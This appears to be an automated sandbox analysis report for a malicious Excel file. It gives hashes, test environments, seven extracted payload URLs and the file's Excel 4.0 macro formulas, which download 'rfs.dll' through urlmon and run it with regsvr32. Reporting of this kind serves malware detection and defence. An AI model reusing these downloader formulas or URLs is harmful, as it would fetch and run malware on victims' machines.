General
-
Target
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
Size
27KB
-
Sample
240909-1ls5mstenb
-
MD5
75b137eec11e92890485413127c2a34b
-
SHA1
ee5ad0c8f90e359b3620990047fb1d50ce9654a8
-
SHA256
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
SHA512
cce5d37bd796a09d9a15cdeb077795f03017d08dc7466beae68e291075bff2702740ea3a6403d1a5ae4efe4dd8414297d917ab481b2b0f8cce04a8c6ce7a6883
-
SSDEEP
768:nCOv7JUnzEmD4ys2ewg4F32ByH3nFn1Kk8jI:CKdU4Y2JwZ/XFn4k8jI
Static task
static1
Behavioral task
behavioral1
Sample
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
http://henrysfreshroast.com/6cc4ts0bkrOlXq/
http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/
http://blog.centerking.top/wp-includes/DBq5jx/
http://polarrefrigeracao.com.br/fontes/y7QpO/
http://filmsetserie.dx.am/img/ghCY9J5KD1J/
https://vagbharati.in/wp-admin/nYBb/
http://advogadogoiania.com.br/wp-includes/O9Az4/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/6cc4ts0bkrOlXq/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/DBq5jx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://polarrefrigeracao.com.br/fontes/y7QpO/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://filmsetserie.dx.am/img/ghCY9J5KD1J/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vagbharati.in/wp-admin/nYBb/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/O9Az4/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Targets
-
-
Target
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
Size
27KB
-
MD5
75b137eec11e92890485413127c2a34b
-
SHA1
ee5ad0c8f90e359b3620990047fb1d50ce9654a8
-
SHA256
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
SHA512
cce5d37bd796a09d9a15cdeb077795f03017d08dc7466beae68e291075bff2702740ea3a6403d1a5ae4efe4dd8414297d917ab481b2b0f8cce04a8c6ce7a6883
-
SSDEEP
768:nCOv7JUnzEmD4ys2ewg4F32ByH3nFn1Kk8jI:CKdU4Y2JwZ/XFn4k8jI
Score: 3/10